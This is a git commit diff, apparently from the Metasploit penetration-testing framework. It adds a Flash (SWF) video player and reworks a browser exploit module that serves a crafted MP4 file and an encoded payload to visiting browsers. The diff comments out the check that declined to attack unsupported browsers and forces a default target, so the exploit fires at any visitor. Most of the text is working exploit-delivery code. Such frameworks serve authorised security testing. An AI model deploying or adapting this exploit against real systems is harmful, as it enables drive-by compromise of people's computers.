Merge branch 'mp4-player'
commit
0c70586625
|
@ -0,0 +1,22 @@
|
|||
function randText(newLength:Number):String{
|
||||
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
var alphabet:Array = a.split("");
|
||||
var randomLetter:String = "";
|
||||
for (var i:Number = 0; i < newLength; i++){
|
||||
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
|
||||
}
|
||||
return randomLetter;
|
||||
}
|
||||
|
||||
var connect_nc:NetConnection = new NetConnection();
|
||||
connect_nc.connect(null);
|
||||
|
||||
var stream_ns:NetStream = new NetStream(connect_nc);
|
||||
stream_ns.onStatus = function(p_evt:Object):Void { }
|
||||
|
||||
|
||||
video.attachVideo(stream_ns);
|
||||
|
||||
stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
|
||||
|
||||
|
Binary file not shown.
Binary file not shown.
|
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
|
||||
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -94,19 +93,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
#send_not_found(cli)
|
||||
#return
|
||||
my_target = targets[1]
|
||||
end
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
||||
#print_error("Sorry, not sending you the mp4 for now")
|
||||
#send_not_found(cli)
|
||||
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
# The SWF request itself
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
|
||||
return
|
||||
end
|
||||
|
||||
# Redirect to a trailing slash so relative paths work properly
|
||||
if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
|
||||
uri = resource_uri + "/"
|
||||
send_redirect(cli, uri)
|
||||
return
|
||||
end
|
||||
|
||||
# Set payload depending on target
|
||||
p = payload.encoded
|
||||
|
||||
|
@ -140,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
|
||||
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
|
||||
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
|
@ -166,9 +177,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
@mp4 = create_mp4
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
|
||||
fd = ::File.open( path, "rb" )
|
||||
swf = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
return swf
|
||||
end
|
||||
|
||||
def create_mp4
|
||||
ftypAtom = "\x00\x00\x00\x20" #Size
|
||||
ftypAtom << "ftypisom"
|
||||
|
|
Loading…
Reference in New Issue